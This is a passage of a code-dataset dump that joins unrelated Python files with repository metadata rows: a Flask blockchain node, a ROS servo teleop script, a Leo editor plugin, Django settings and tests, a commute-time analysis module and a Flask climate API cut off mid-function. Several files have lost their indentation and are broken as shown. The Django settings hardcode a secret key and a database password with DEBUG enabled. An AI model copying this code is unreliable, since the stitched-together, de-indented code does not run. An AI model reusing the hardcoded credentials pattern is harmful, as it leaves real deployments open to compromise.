hash_operation = hashlib.sha256(str(proof**2 - previous_proof**2).encode()).hexdigest()
if hash_operation[:4] != '0000':
return False
previous_block = block
block_index += 1
return True
def add_transaction(self, sender, receiver, amount):
self.transactions.append({'sender': sender,
'receiver':receiver,
'amount': amount})
previous_block = self.get_previous_block()
return previous_block['index'] + 1
def add_node(self, address):
parsed_url = urlparse(address)
self.nodes.add(parsed_url.netloc)
def replace_chain(self):
network = self.nodes
longest_chain = None
max_length = len(self.chain)
for node in network:
response = requests.get(f'http://{node}/get_chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
if length > max_length and self.is_chain_valid(chain):
max_length = length
longest_chain = chain
if longest_chain:
self.chain = longest_chain
return True
return False
#Part 2 : mine the blockchain
#create flask web app
app = Flask(__name__)
# create an address for this node (the app runs on port 5003, see app.run below)
node_address = str(uuid4()).replace('-', '')
#create a blockchain
blockchain = Blockchain()
#mine a block
@app.route('/mine_block', methods = ['GET'])
def mine_block():
previous_block = blockchain.get_previous_block()
previous_proof = previous_block['proof']
proof = blockchain.proof_of_work(previous_proof)
previous_hash = blockchain.hash(previous_block)
blockchain.add_transaction(sender = node_address, receiver = 'abc', amount = 1)
block = blockchain.create_block(proof, previous_hash)
response = {'message': 'Congrats on mining a new block',
'index': block['index'],
'timestamp': block['timestamp'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
'transactions': block['transactions']}
return jsonify(response), 200
#get the full blockchain on postman
@app.route('/get_chain', methods = ['GET'])
def get_chain():
response = {'chain': blockchain.chain,
'length': len(blockchain.chain)}
return jsonify(response), 200
@app.route('/is_valid', methods = ['GET'])
def is_valid():
is_valid = blockchain.is_chain_valid(blockchain.chain)
if is_valid:
response = {'message': 'All good!'}
else:
        response = {'message': 'We have a problem!'}
return jsonify(response), 200
#Add new transaction to the blockchain
@app.route('/add_transaction', methods = ['POST'])
def add_transaction():
json = request.get_json()
transaction_keys = ['sender', 'receiver', 'amount']
if not all (key in json for key in transaction_keys):
return 'Part of transaction are missing', 400
index = blockchain.add_transaction(json['sender'], json['receiver'], json['amount'])
response = {'message': f'This Transaction will be in block {index}'}
return jsonify(response), 201
#part 3 - Decentralization
#connecting new nodes:
@app.route('/connect_node', methods = ['POST'])
def connect_node():
json = request.get_json()
nodes = json.get('nodes')
if nodes is None:
return "No available Nodes", 400
for node in nodes:
blockchain.add_node(node)
response = {'message': 'All connected nodes are:',
'total_nodes': list(blockchain.nodes)}
return jsonify(response), 201
#Replace chain with longest chain for consensus ie used when competing chains exist
@app.route('/replace_chain', methods = ['GET'])
def replace_chain():
is_chain_replaced = blockchain.replace_chain()
if is_chain_replaced:
response = {'message': 'Enforced Consensus by replacing multiple chains with the longest chain!',
'new_chain': blockchain.chain}
else:
response = {'message': 'All good!',
'actual_chain': blockchain.chain}
return jsonify(response), 200
#run the app
app.run(host = '0.0.0.0', port = 5003)
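# Example interaction (illustrative; assumes the node is running locally):
#   curl http://localhost:5003/get_chain
#   curl http://localhost:5003/mine_block
#   curl -X POST -H "Content-Type: application/json" \
#        -d '{"sender": "a", "receiver": "b", "amount": 1}' \
#        http://localhost:5003/add_transaction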
|
[
"anush.dsouza@sprinklr.com"
] |
anush.dsouza@sprinklr.com
|
8bc6202d3e4885c8c06b67a814828638cd8cc8e3
|
a7f49524e041c7e8d3ca5d732f90f06851e5b348
|
/src/beginner_tutorials/scripts/test_teleop.py
|
3b5a95e5651c08f5836c973725e1897746cf8875
|
[] |
no_license
|
dannyel2511/project-shark
|
fa03fa7a73416558be67e1ab07e8bb5f36711c91
|
8f55c74bfb486305bd9aa48aeeb410df918dbdef
|
refs/heads/master
| 2020-04-06T21:14:55.385511
| 2018-11-27T23:55:26
| 2018-11-27T23:55:26
| 157,797,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,362
|
py
|
#!/usr/bin/env python
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from std_msgs.msg import UInt16
import sys, select, termios, tty
msg = "Write W A S D"
def getKey():
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
if __name__=="__main__":
pub1 = rospy.Publisher('servo1', UInt16, queue_size=10)
pub2 = rospy.Publisher('servo2', UInt16, queue_size=10)
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('servos_ctrl')
degress1 = 0
degress2 = 0
rate = rospy.Rate(100)
print(msg)
while(1):
key = getKey()
key = key.lower()
if(key == 'i'):
degress1 += 1
if(key == 'k'):
degress1 -= 1
if(key == 'o'):
degress2 += 1
if(key == 'l'):
degress2 -= 1
if degress1< 0:
degress1=0
if degress2< 0:
degress2=0
if degress1 >180:
degress1=180
if degress2> 180:
degress2=180
print("Servo 1:",degress1)
print("Servo 2:",degress2)
pub1.publish(degress1)
pub2.publish(degress2)
if (key == '\x03'):
break
rate.sleep()
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
|
[
"dany_2511@live.com"
] |
dany_2511@live.com
|
21988568418b2069479c3265e9083ef3501f7e67
|
7296c60573cdb2688fbb9e721ff4399d6465d7a2
|
/tests.py
|
b90dcd2ebbc4e87b59d0c8c8557f174156806237
|
[] |
no_license
|
aclark4life/other
|
bc1562c451a9537743029c079478c22b1f514e18
|
dfdc253d43f28b2f7d6147c86ef69a6a08e60b48
|
refs/heads/master
| 2021-01-22T09:05:21.681038
| 2012-12-12T01:21:01
| 2012-12-12T01:21:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
from other import IUgly
from other import UglyDude
from unittest import TestCase
from unittest import main
from zope.interface import implements
from zope.interface.verify import verifyObject
class TestSuite(TestCase): # Not really a test suite
"""
"""
def test_ugly(self):
"""
Verify object has a beautiful attribute
"""
        ugly_thing = UglyDude()  # UglyDude is the class imported above; UglyThing was undefined
verifyObject(IUgly, ugly_thing)
if __name__ == '__main__':
main()
|
[
"aclark@aclark.net"
] |
aclark@aclark.net
|
a4375d25f59135cf9bd9c32c9bc56a270276239e
|
7966d7b17a967be4d7ae856074edb29ea42e2d03
|
/23_memoize/decorator.py
|
9bd2ea691a1d2a319c0068649d7a936ccd32fe09
|
[] |
no_license
|
th0mazzz/SoftDev2
|
8642e4c32537842396b996890c6920df00d39276
|
67151019609229b0d3465456f37b007ae7b7d8ed
|
refs/heads/master
| 2020-04-19T13:04:04.739708
| 2019-05-03T04:52:52
| 2019-05-03T04:52:52
| 168,208,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
import random
def make_HTML_heading(f):
txt = f()
def inner():
return '<h1>' + txt + '</h1>'
return inner
@make_HTML_heading
def greet():
greetings = ['Hello', 'Welcome', 'AYO!', 'Hola', 'Bonjour', 'Word up']
return random.choice(greetings)
# greet is already wrapped by the @make_HTML_heading decorator above, so calling
# it directly yields a single <h1>...</h1>; re-wrapping it would nest the tags
print(greet())
|
[
"tzhao2@stuy.edu"
] |
tzhao2@stuy.edu
|
4e56868658dfc090de8a68bf44d6e20032def345
|
dba0f66eef2f173b8cc148d0c51fc338c7c9a70e
|
/leo/plugins/script_io_to_body.py
|
64a5971a900769082df1bc46a913b20e70bdfbab
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
iggu/leo-editor
|
6adcbf1c7727f00115a62ffb68d31c22624e4404
|
a8cade8563afdc6b76638e152b91679209a5bf94
|
refs/heads/master
| 2022-03-16T05:44:42.864262
| 2022-02-25T13:30:51
| 2022-02-25T13:30:51
| 232,984,997
| 0
| 0
|
NOASSERTION
| 2021-05-05T03:32:44
| 2020-01-10T06:53:10
| null |
UTF-8
|
Python
| false
| false
| 2,699
|
py
|
#@+leo-ver=5-thin
#@+node:edream.110203113231.925: * @file ../plugins/script_io_to_body.py
"""Sends output from the Execute Script command to the end of the body pane."""
#@+<< imports >>
#@+node:ekr.20050101090207.4: ** << imports >>
from leo.core import leoGlobals as g
#@-<< imports >>
#@+others
#@+node:ekr.20071025195133: ** init
def init():
"""Return True if the plugin has loaded successfully."""
g.registerHandler('after-create-leo-frame', onCreate)
g.plugin_signon(__name__)
return True
#@+node:ekr.20071212092332: ** onCreate
def onCreate(tag, keys):
c = keys.get('c')
if c and c.frame.log:
g.pr('overriding c.executeScript')
# Inject ivars.
log = c.frame.log
c.script_io_to_body_oldexec = c.executeScript
c.script_io_to_body_oldput = log.put
c.script_io_to_body_oldputnl = log.putnl
# Override c.executeScript.
g.funcToMethod(newExecuteScript, c.__class__, 'executeScript')
c.k.overrideCommand('execute-script', c.executeScript)
#@+node:edream.110203113231.928: ** newPut and newPutNl (script_io_to_body.py)
# Same as frame.put except sends output to the end of the body text.
def newPut(self, s, *args, **keys):
p, u = self.c.p, self.c.undoer
body = self.frame.body
w = body.wrapper
if w:
bunch = u.beforeChangeBody(p)
w.insert("end", s)
p.v.b = w.getAllText()
u.afterChangeBody(p, 'put-to-body-text', bunch)
# Same as frame.putnl except sends output to the end of the body text.
def newPutNl(self, s, *args, **keys):
newPut(self, '\n')
#@+node:ekr.20071212091008.1: ** newExecuteScript & helpers
def newExecuteScript(self,
event=None, p=None, script=None,
useSelectedText=True, define_g=True,
define_name='__main__', silent=False
):
c = self
log = c.frame.log
redirect(c)
# Use silent to suppress 'end of script message'
c.script_io_to_body_oldexec(event, p, script, useSelectedText, define_g, define_name, silent=True)
undirect(c)
# Now issue the 'end of script' message'
if not silent:
tabName = log and hasattr(log, 'tabName') and log.tabName or 'Log'
g.ecnl()
g.es("end of script", color="purple", tabName=tabName)
#@+node:ekr.20071212090128: *3* redirect
def redirect(c):
log = c.frame.log.__class__
g.funcToMethod(newPut, log, "put")
g.funcToMethod(newPutNl, log, "putnl")
#@+node:ekr.20071212091008: *3* undirect
def undirect(c):
log = c.frame.log.__class__
g.funcToMethod(c.script_io_to_body_oldput, log, "put")
g.funcToMethod(c.script_io_to_body_oldputnl, log, "putnl")
#@-others
#@@language python
#@@tabwidth -4
#@-leo
|
[
"edreamleo@gmail.com"
] |
edreamleo@gmail.com
|
1e1ca32949ab7f4b87a9a82ade3d753ba1625207
|
a9a16c414d7370b2ca6442b8125d6b6f9b3d6556
|
/chapter_15_Practice_Makes_Perfect/01_Practice_Practice_Practice.py
|
51daa0041f8b8946ca854b78b7e006dfbdbbfe50
|
[] |
no_license
|
dennisnderitu254/CodeCademy-Py
|
99f1cb9fa011f1586d543650c5001de17f04b8b2
|
758067dc53fdb442ab18dd922dacd13cc8846ebb
|
refs/heads/master
| 2021-07-12T10:01:58.854222
| 2017-10-12T20:03:56
| 2017-10-12T20:03:56
| 106,739,488
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 38
|
py
|
# there is nothing in this lesson
pass
|
[
"dknderitu@gmail.com"
] |
dknderitu@gmail.com
|
e2d4ce3fa0ff8f54f16b22a66acca5b6fb6a0aad
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_099/ch11_2019_08_26_20_10_39_808921.py
|
28eb0e6b405098155853694d66fc3e46e0555cbf
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 55
|
py
|
def celsius_para_farenheit(tempc):
return tempc*9/5+32
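# Quick check (added for illustration): celsius_para_farenheit(100) returns 212.0
# and celsius_para_farenheit(0) returns 32.0.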
|
[
"you@example.com"
] |
you@example.com
|
e6b7c319cddbd8047260e2cb7481707eba515cc9
|
7c09c2b417d6ac454d98974019a21c08c8762704
|
/myapp/settings.py
|
4b21640a0ca76bbc7ebbd069255ea3d10d08f8a1
|
[] |
no_license
|
ehtiramabdullayev/myapp
|
03035323b3e13be3d524cafd65c3dd71db3731d8
|
d9b62c4babfa1acf407f0274e176f6397c0036bf
|
refs/heads/master
| 2021-01-23T07:59:53.683055
| 2014-05-25T08:42:31
| 2014-05-25T08:42:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,251
|
py
|
"""
Django settings for myapp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.urls import patterns, include, url
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'w70h!bgnbt(mpwtzaakqkqafknq6x@7f%#bqt69+yr#)2c(*@7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'workapp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'django.contrib.sessions.middleware.SessionMiddleware'
)
ROOT_URLCONF = 'myapp.urls'
WSGI_APPLICATION = 'myapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'openpg',
'PASSWORD': 'openpgpwd',
'HOST': '127.0.0.1', # Or an IP Address that your DB is hosted on
'PORT': '5432',
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'module',
# 'USER': 'root',
# 'PASSWORD': '',
# 'HOST': '127.0.0.1', # Or an IP Address that your DB is hosted on
# 'PORT': '3306',
# }
# }
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__), 'templates'),
)
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'az-Az'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
SITE_ID=1
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.static',
)
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT_DEVELOPMENT = os.path.join(PROJECT_DIR, '../static/')
STATICFILES_DIRS = (
'C:/Django-1.6.4/django/bin/myapp/static',
)
|
[
"ehtiramabdullayev@gmail.com"
] |
ehtiramabdullayev@gmail.com
|
7510fbbd9c98a4b31410110aa00229ec8cd6e13a
|
61eaf0d21be4c76e16191f610e4871f71ea23c3c
|
/min and max temps during 3-31.py
|
d545bf826f26dd79b2ae45932c0738c26dd2a22f
|
[] |
no_license
|
Dpinkney001/DATA-SCIENCE-ASSIGNMENTS
|
0f7c1e50a3fc65986edc9906e940c34715217b75
|
fb8d5c52e2733768ce1b927b3c54464d99c2a533
|
refs/heads/master
| 2021-03-22T00:22:20.594942
| 2017-09-25T08:19:12
| 2017-09-25T08:19:12
| 104,555,772
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,222
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 11 18:52:18 2017
@author: Duvall Pinkney
"""
import matplotlib.pyplot as plt
import urllib
import urllib.request
import urllib.error
import urllib.parse
import re
def getTempFromWeb(kind,url):
page = urllib.request.urlopen(url)
lines = page.readlines()
for i in range(len(lines)):
if lines[i].decode("utf8").find(kind+" Temperature") >= 0:
m = i
break
searchObj = re.search('\d+', lines[m+2].decode("utf8"))
return int(searchObj.group(0))
def main():
prefix = "http://www.wunderground.com/history/airport/KLGA/"
suffix = "/31/03/DailyHistory"
years = []
maxVals = []
for year in range(1991,2017):
years.append(year)
url = prefix+str(year)+suffix
M = getTempFromWeb("Max",url)
maxVals.append(M)
print(year, M)
plt.plot(years, maxVals, color='r', label="Maxtemp")
plt.title("NYC Temps for March 31")
plt.xlabel('Years')
plt.ylabel('Degrees')
plt.legend(loc = 2,fontsize = 'x-small')
plt.show()
#create histogram of max temps for march 31
#xAxis = range(29)
#yAxis = range(101)
plt.hist(maxVals)
#plt.axis([1986, 2017, 0, 101])
plt.title("Histogram of Max Temps on March 31 Since 1986")
plt.xlabel("Temperatures")
plt.show()
print("The list of max values are: ", maxVals)
#plot of mininum temps
years = []
minVals = []
for year in range(1991,2017):
years.append(year)
url = prefix+str(year)+suffix
Min = getTempFromWeb("Min",url)
minVals.append(Min)
print(year, Min)
plt.plot(years, minVals, color='r', label="Mininumtemp")
plt.title("NYC Temps for March 31")
plt.xlabel('Years')
plt.ylabel('Degrees')
plt.legend(loc = 2,fontsize = 'x-small')
plt.show()
print("The list of min values are: ", minVals)
plt.hist(minVals)
#plt.axis([1986, 2017, 0, 101])
plt.title("Histogram of Min Temps on March 31 Since 1986")
plt.xlabel("Temperatures")
plt.show()
main()
|
[
"noreply@github.com"
] |
Dpinkney001.noreply@github.com
|
d23d3fd69628c2b1a999c5681d113cbbc3b30a91
|
daa9e61b910462012060dd34be7305d6b0e4f5f4
|
/gen_Lorenz.py
|
edc8d10aa2e14972206f28ac558ffff39f2afa72
|
[] |
no_license
|
lwyanne/Echo-State-Network
|
51bd130b2749e97580e07184d6dbddbcdefe4213
|
6193a78a4839e12f7231e9dbe621257f78714754
|
refs/heads/master
| 2020-03-29T08:18:35.998550
| 2018-10-11T05:14:44
| 2018-10-11T05:14:44
| 149,702,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
"""
Generate a trajectory of the Lorenz system
"""
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from function import *
u=gen_Lorenz(len=10000)
u=downsample(u)
threeDplot(u,'Lorenz')
plt.figure()
# u1 and u3 were undefined; assuming an (N, 3) trajectory, plot x and z instead
plt.plot(u[:, 0])
plt.plot(u[:, 2])
plt.show()
|
[
"921174623@qq.com"
] |
921174623@qq.com
|
425bd3775fee51bd677d313e062215e408b513fc
|
79bc9a420df5c706b2ae06f4b75bf2bd2ba9646e
|
/emission/analysis/modelling/work_time.py
|
050691db89eaff2c5dc6e32a22810e75b94758ff
|
[
"BSD-3-Clause"
] |
permissive
|
Andrew-Tan/e-mission-server
|
7022786a13b4be87be62cfc2cc6d82543d063e5d
|
91d59bee86e63d803e401f10f4b6a2502effedda
|
refs/heads/master
| 2021-01-16T18:25:17.860723
| 2017-11-21T19:24:40
| 2017-11-21T19:24:40
| 100,073,534
| 0
| 0
|
BSD-3-Clause
| 2018-05-05T18:26:36
| 2017-08-11T22:13:44
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,066
|
py
|
__author__ = 'Yin'
# Standard imports
# Our imports
import emission.core.get_database as edb
import work_place as wp
import emission.core.common as ec
time_list = [[0,2],[2,4],[4,6],[6,8], [8,10], [10,12], [12,14], [14,16], [16,18], [18,20],[20,22],[22,24]]
def get_work_start_time(user_id,day):
# day should be from 1 to 5
# get a list of work starttime for Mon, or ...
Sections=edb.get_section_db()
list_of_time=[]
candidate_pnts=[]
work=wp.detect_daily_work_office(user_id,day)
for section in Sections.find({'$and':[{"user_id": user_id},{"commute":'to'}]}):
if work!='N/A' and ec.Is_place(section['section_end_point'],work,200):
list_of_time.append(section['section_end_time'])
return list_of_time
def get_work_end_time(user_id,day):
# day should be from 1 to 5
# get a list of work starttime for Mon, or ...
Sections=edb.get_section_db()
list_of_time=[]
candidate_pnts=[]
work=wp.detect_daily_work_office(user_id,day)
for section in Sections.find({'$and':[{"user_id": user_id},{"commute":'from'}]}):
if work!='N/A' and ec.Is_place(section['section_start_point'],work,200):
list_of_time.append(section['section_end_time'])
return list_of_time
def get_user_work_start_time(user):
list_of_time=[]
for day in range(1,6):
list_of_time.extend(get_work_start_time(user,day))
return list_of_time
def get_user_work_end_time(user):
list_of_time=[]
for day in range(1,6):
list_of_time.extend(get_work_end_time(user,day))
return list_of_time
def get_Alluser_work_start_time():
list_of_time=[]
Profiles=edb.get_profile_db()
for user in Profiles.distinct("user_id"):
for day in range(1,6):
list_of_time.extend(get_work_start_time(user,day))
return list_of_time
def get_Alluser_work_end_time():
list_of_time=[]
Profiles=edb.get_profile_db()
for user in Profiles.distinct("user_id"):
for day in range(1,6):
list_of_time.extend(get_work_end_time(user,day))
return list_of_time
############################################## pie chart below ###############################################
def get_user_work_start_time_pie(user,start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({"$and":[{'user_id':user},{'arr_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_user_work_end_time_pie(user,start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({"$and":[{'user_id':user},{'dep_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_Alluser_work_start_time_pie(start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
        # both constraints belong in the query filter; the second positional
        # argument to find() is a projection, so the date range was being ignored
        timeCountMap[key] = Worktimes.find({"$and": [{'arr_hour': {"$gte": timesection[0], "$lt": timesection[1]}},
                                                     {"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_Alluser_work_end_time_pie(start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
        # both constraints belong in the query filter; the second positional
        # argument to find() is a projection, so the date range was being ignored
        timeCountMap[key] = Worktimes.find({"$and": [{'dep_hour': {"$gte": timesection[0], "$lt": timesection[1]}},
                                                     {"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
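# Illustrative example (not part of the original module): each *_pie helper
# returns a dict keyed by two-hour window, e.g.
#   {'00:01 - 02:00': 0, '02:01 - 04:00': 1, ..., '22:01 - 24:00': 4}
# where every value is the count of matching arrival/departure records.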
|
[
"shankari@eecs.berkeley.edu"
] |
shankari@eecs.berkeley.edu
|
7bd82afe2515d2d5a7a01681f53e2e8332cc0024
|
cc10b52870d3487b6a233fa6d63fcad45277e927
|
/env/bin/django-admin
|
17cfafa0c179f5ff7fad4ecdeff172c39379f971
|
[] |
no_license
|
malikgr8/Udemy_ecommerce_Source_code
|
9533f6749715df8b3bc05ce955a7dcd78412a9b3
|
b3e963ae9eadb43aece0db18aecfc6b805770a46
|
refs/heads/main
| 2023-06-24T03:15:30.050748
| 2021-07-20T16:47:21
| 2021-07-20T16:47:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
#!/home/macaulay/just_practice/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
|
[
"pythonfamous@gmail.com"
] |
pythonfamous@gmail.com
|
|
586d7369371369435143676c7eede4bc2e9682a4
|
1a74d7a40749f5a233ab5a777056b62d8a83b2ce
|
/configs-sample.py
|
a254fa9dc989142dad408e55bfd3d465141c0949
|
[
"Apache-2.0"
] |
permissive
|
gisairo/amnesia
|
451f16eb5e02105e5ce9b3ca00763ba43ae56056
|
79010bfee4b43ac6b25ff72fd536d8f180b42d0a
|
refs/heads/master
| 2020-12-25T21:13:05.984266
| 2016-08-12T15:36:16
| 2016-08-12T15:36:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
#!/usr/bin/env python
twitter = {
'consumer_key': 'your_consumer_key',
'consumer_secret': 'your_consumer_secret',
'access_token': 'your_oauth_token',
'access_token_secret': 'your_oauth_token_secret',
'delete_after_days': 5
}
|
[
"jaisen@jmathai.com"
] |
jaisen@jmathai.com
|
354fa49447d55ca60b2e75090802d8a05cb93653
|
87ba60025d6385fbae2ba693c2758c819dd86bd7
|
/polls/tests.py
|
9be58097a239949634812acf297f427fb35d2ebd
|
[] |
no_license
|
jchen706/A-Django-Poll-Application
|
21f82159bd8d0a1b55e32af6f41fa95449959d62
|
13de7ed9bb8724490f344efc58c4033570427904
|
refs/heads/master
| 2020-03-26T02:30:42.642182
| 2018-08-11T22:45:29
| 2018-08-11T22:45:29
| 144,413,621
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,794
|
py
|
from django.test import TestCase
from django.urls import reverse
# Create your tests here.
import datetime
from django.utils import timezone
from .models import Question
class QuestionModelTests(TestCase):
def test_was_published_recently_with_future_question(self):
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date = time)
self.assertIs(future_question.was_published_recently(), False)
def create_question(question_text, days):
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionIndexViewTests(TestCase):
def test_no_questions(self):
"""
If no questions exist, an appropriate message is displayed.
"""
response = self.client.get(reverse('polls:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are available.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_past_question(self):
"""
Questions with a pub_date in the past are displayed on the
index page.
"""
create_question(question_text="Past question.", days=-30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_future_question(self):
"""
Questions with a pub_date in the future aren't displayed on
the index page.
"""
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('polls:index'))
self.assertContains(response, "No polls are available.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_future_question_and_past_question(self):
"""
Even if both past and future questions exist, only past questions
are displayed.
"""
create_question(question_text="Past question.", days=-30)
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
"""
The questions index page may display multiple questions.
"""
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question 2.>', '<Question: Past question 1.>']
)
class QuestionDetailViewTests(TestCase):
def test_future_question(self):
"""
The detail view of a question with a pub_date in the future
returns a 404 not found.
"""
future_question = create_question(question_text='Future question.', days=5)
url = reverse('polls:detail', args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""
The detail view of a question with a pub_date in the past
displays the question's text.
"""
past_question = create_question(question_text='Past Question.', days=-5)
url = reverse('polls:detail', args=(past_question.id,))
response = self.client.get(url)
self.assertContains(response, past_question.question_text)
|
[
"junchen1511@gmail.com"
] |
junchen1511@gmail.com
|
f19c008e9dd2ca531140d9ec1fae17d55ccbf46e
|
1542f28c6c25b1d089961ad5662fb239e2be10f1
|
/app.py
|
b2404506ef34cfe5128864ca045e9b0f3b354d44
|
[] |
no_license
|
NHigs58/sqlalchemy-challenge
|
a61aa3ed2697329bf21c24c68ad2f945aaec91ad
|
3e3c5c5061761bb09b34710ea15d68f3613f4286
|
refs/heads/master
| 2021-02-06T06:06:47.391000
| 2020-03-01T04:04:14
| 2020-03-01T04:04:14
| 243,885,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,271
|
py
|
# import dependencies
import datetime as dt
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# initializes database
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
# creates references to Measurement
# and Station tables
Measurement = Base.classes.measurement
Station = Base.classes.station
session = Session(engine)
# start app
app = Flask(__name__)
# routes
@app.route("/")
def homepage():
"""List of all returnable API routes."""
return(
f"(Dates range from 2010-01-01 to 2017-08-23). <br><br>"
f"Available Routes: <br>"
f"/api/v1.0/precipitation<br/>"
f"Returns dates and temperature from the Date range. <br><br>"
f"/api/v1.0/stations<br/>"
f"Returns a json list of stations. <br><br>"
f"/api/v1.0/tobs<br/>"
f"Returns a list of Temperature Observations for Date range. <br><br>"
f"/api/v1.0/yyyy-mm-dd/<br/>"
f"Returns the Average, Max, and Min temperatures for a given start date.<br><br>"
f"/api/v1.0/yyyy-mm-dd/yyyy-mm-dd/<br/>"
f"Returns an Average, Max, and Min temperatures for a given date range."
)
@app.route("/api/v1.0/precipitation")
def precipitation():
"""Return Dates and Temp from the last year."""
